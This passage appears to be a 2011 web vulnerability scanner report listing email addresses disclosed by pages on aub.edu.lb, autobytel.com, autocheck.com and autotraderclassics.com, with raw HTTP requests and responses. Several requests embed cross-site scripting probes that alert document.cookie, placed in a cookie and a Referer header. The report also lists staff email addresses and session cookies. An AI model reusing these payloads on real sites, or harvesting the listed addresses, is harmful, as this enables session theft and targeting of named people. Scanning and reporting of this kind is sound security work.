User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:47 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.138. http://www.aub.edu.lb/tour/admissions/AUB-VR_196.html/x22/x3e/x3cli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aub.edu.lb
Path:   /tour/admissions/AUB-VR_196.html/x22/x3e/x3cli

Issue detail

The following email addresses were disclosed in the response:
  • feedback@aub.edu.lb
  • webmaster@aub.edu.lb

Request

GET /tour/admissions/AUB-VR_196.html/x22/x3e/x3cli HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:46 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.139. http://www.aub.edu.lb/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aub.edu.lb
Path:   /x22

Issue detail

The following email addresses were disclosed in the response:
  • feedback@aub.edu.lb
  • webmaster@aub.edu.lb

Request

GET /x22 HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:38 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.140. http://www.aub.edu.lb/x22/x3e/x3cli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aub.edu.lb
Path:   /x22/x3e/x3cli

Issue detail

The following email addresses were disclosed in the response:
  • feedback@aub.edu.lb
  • webmaster@aub.edu.lb

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:37 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Via: 1.1 www.aub.edu.lb
Connection: close
Content-Length: 22310

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>American University of Beirut, AUB - private, independent unive
...[SNIP]...
<a href="mailto:feedback@aub.edu.lb" class="contact">feedback@aub.edu.lb</a>
...[SNIP]...
<a href="mailto:webmaster@aub.edu.lb" class="contact">webmaster@aub.edu.lb</a>
...[SNIP]...

24.141. http://www.autobytel.com/content/home/help/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The following email addresses were disclosed in the response:
  • ConsumerCare@autobytel.com
  • classifieds@Autobytel.com

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com">ConsumerCare@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com">ConsumerCare@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com">ConsumerCare@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com">ConsumerCare@autobytel.com</A>
...[SNIP]...
<A href="mailto:classifieds@Autobytel.com?subject=I want to remove my classified ad">classifieds@Autobytel.com</A>
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com">ConsumerCare@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com">ConsumerCare@autobytel.com</A>
...[SNIP]...

24.142. http://www.autobytel.com/content/home/help/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The following email addresses were disclosed in the response:
  • ABTPrivacy@autobytel.com
  • consumercare@autobytel.com

Request

GET /content/home/help/index.cfm?id=13148;ABTL&action=privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:31 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55331


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<a href="mailto:ABTPrivacy@autobytel.com">ABTPrivacy@autobytel.com</a>
...[SNIP]...
<a href="mailto:ABTPrivacy@autobytel.com">ABTPrivacy@autobytel.com</a>
...[SNIP]...
<a
href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a
href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a
href="mailto:ABTPrivacy@autobytel.com">ABTPrivacy@autobytel.com</a>
...[SNIP]...
<a
href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...

24.143. http://www.autobytel.com/content/home/help/index.cfm/action/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The following email address was disclosed in the response:
  • consumercare@autobytel.com

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:11 GMT
Content-Length: 32321
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<a href="mailto:consumercare@autobytel.com">
...[SNIP]...

24.144. http://www.autobytel.com/content/home/help/index.cfm/action/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The following email addresses were disclosed in the response:
  • ConsumerCare@autobytel.com
  • classifieds@autobytel.com
  • investor@pondel.com
  • jimh@autobytel.com
  • johnsteerman@autobytel.com
  • joselync@autobytel.com
  • jrosen@autobytel.com
  • marks@autobytel.com
  • products@autobytel.com
  • scottp@autobytel.com
  • stevel@autobytel.com
  • taraw@autobytel.com

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36606


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<A HREF="mailto:ConsumerCare@autobytel.com" CLASS="link">ConsumerCare@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:classifieds@autobytel.com" CLASS="link">classifieds@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:marks@autobytel.com" CLASS="link">marks@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:marks@autobytel.com" CLASS="link">marks@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:investor@pondel.com" CLASS="link">investor@pondel.com</A>
...[SNIP]...
<A HREF="mailto:jimh@autobytel.com" CLASS="link">jimh@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:scottp@autobytel.com" CLASS="link">scottp@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:taraw@autobytel.com" CLASS="link">taraw@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:products@autobytel.com" CLASS="link">products@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:products@autobytel.com" CLASS="link">products@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:johnsteerman@autobytel.com" CLASS="link">johnsteerman@autobytel.com</A>
...[SNIP]...
<A HREF="mailto:stevel@autobytel.com" CLASS="link">stevel@autobytel.com</A>
...[SNIP]...
<a href="mailto:jrosen@autobytel.com" class="link">jrosen@autobytel.com</a>
...[SNIP]...
<A HREF="mailto:joselync@autobytel.com" CLASS="link">joselync@autobytel.com</A>
...[SNIP]...

24.145. http://www.autobytel.com/content/home/help/index.cfm/action/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The following email addresses were disclosed in the response:
  • ABTPrivacy@autobytel.com
  • consumercare@autobytel.com

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 55317
Expires: Mon, 24 Jan 2011 23:37:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:03 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<a href="mailto:ABTPrivacy@autobytel.com">ABTPrivacy@autobytel.com</a>
...[SNIP]...
<a href="mailto:ABTPrivacy@autobytel.com">ABTPrivacy@autobytel.com</a>
...[SNIP]...
<a
href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a
href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...
<a
href="mailto:ABTPrivacy@autobytel.com">ABTPrivacy@autobytel.com</a>
...[SNIP]...
<a
href="mailto:consumercare@autobytel.com">consumercare@autobytel.com</a>
...[SNIP]...

24.146. http://www.autobytel.com/content/home/help/index.cfm/action/terms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The following email addresses were disclosed in the response:
  • ConsumerCare@autobytel.com
  • consumercare@autobytel.com

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB430 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<A HREF="mailto:consumercare@autobytel.com" CLASS="link">ConsumerCare@autobytel.com</A>
...[SNIP]...

24.147. http://www.autocheck.com/consumers/javascripts/jquery.hoverIntent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autocheck.com
Path:   /consumers/javascripts/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:
  • brian@cherne.net

Request

GET /consumers/javascripts/jquery.hoverIntent.js HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:18:45 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Thu, 13 Jan 2011 19:32:46 GMT
ETag: "273962-11fd-4d2f535e"
Accept-Ranges: bytes
Content-Length: 4605
Content-Type: application/x-javascript

.../**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.148. http://www.autocheck.com/consumers/javascripts/main_javascript.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autocheck.com
Path:   /consumers/javascripts/main_javascript.js

Issue detail

The following email address was disclosed in the response:
  • stamhankar@hotmail.com

Request

GET /consumers/javascripts/main_javascript.js HTTP/1.1
Host: www.autocheck.com
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.312031295921916242; referralCookie=cQ2iP5kQz9HfdyY962; JSESSIONID=cQ2iP5kQz9HfdyY962; WT_FPC=id=173.193.214.243-1295921924.19297:lv=1295943525442:ss=1295943525442; op327homepage1gum=a03n09k08o271pm06i39i515f; op327homepage1liid=a03n09k08o271pm06i39i515f

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:18:44 GMT
Server: Apache
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Last-Modified: Thu, 13 Jan 2011 19:32:46 GMT
ETag: "273963-ae28-4d2f535e"
Accept-Ranges: bytes
Content-Length: 44584
Content-Type: application/x-javascript

<!--
function submitform()
{
displayWaitPage();
}

function getBuyNow()
{
for (var i=0; i < document.buyNow.threeOptions.length; i++)
{
if (document.buyNow.threeOptions[i].checked)
{

...[SNIP]...
}
if (fields.length > 0) {
focusField.focus();
alert(fields.join('\n'));
}
return bValid;
}

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function checkEmail(emailStr) {
if (emailStr.length == 0) {
return true;
}
var emailPat=/^(.+)@(.+)$/;
var sp
...[SNIP]...

24.149. http://www.autotraderclassics.com/find/index.xhtml/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /find/index.xhtml/x22

Issue detail

The following email addresses were disclosed in the response:
  • classicscustomerservice@autotrader.com
  • youremail@address.com

Request

GET /find/index.xhtml/x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:30 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=AD90949C1AABB6BF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.240.1295885070163888; path=/; expires=Sat, 03-Jan-15 16:04:30 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=3985170442.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<a
href="mailto:classicscustomerservice@autotrader.com?subject=Page%20Not%20Found%20error%20reported%20by%20user">classicscustomerservice@autotrader.com</a>
...[SNIP]...
<input id="emailAddr" type="text" class="fields" name="udename!tkt_email"
value="youremail@address.com" maxlength="150"
onFocus="document.getElementById('emailAddr').value='';document.getElementById('emailAddr').style.color='#000';"/>
...[SNIP]...

24.150. http://www.autotraderclassics.com/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderclassics.com
Path:   /x22

Issue detail

The following email addresses were disclosed in the response:
  • classicscustomerservice@autotrader.com
  • youremail@address.com

Request

GET /x22 HTTP/1.1
Host: www.autotraderclassics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:37:21 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:04:29 GMT
Content-Length: 19116
Connection: close
Set-Cookie: v1st=38C713FCEE18F8B0; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotraderclassics.com
Set-Cookie: ATC_ID=216.66.31.238.1295885069167883; path=/; expires=Sat, 03-Jan-15 16:04:29 GMT; domain=.autotraderclassics.com
Set-Cookie: BIGipServerwww.autotraderclassics.com=4203274250.14360.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<script type='text/ja
...[SNIP]...
<a
href="mailto:classicscustomerservice@autotrader.com?subject=Page%20Not%20Found%20error%20reported%20by%20user">classicscustomerservice@autotrader.com</a>
...[SNIP]...
<input id="emailAddr" type="text" class="fields" name="udename!tkt_email"
value="youremail@address.com" maxlength="150"
onFocus="document.getElementById('emailAddr').value='';document.getElementById('emailAddr').style.color='#000';"/>
...[SNIP]...

24.151. http://www.autotraderstatic.com/inc/js/myatc/notifications.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /inc/js/myatc/notifications.js

Issue detail

The following email address was disclosed in the response:
  • emailaddress@domain.com

Request

GET /inc/js/myatc/notifications.js HTTP/1.1
Host: www.autotraderstatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
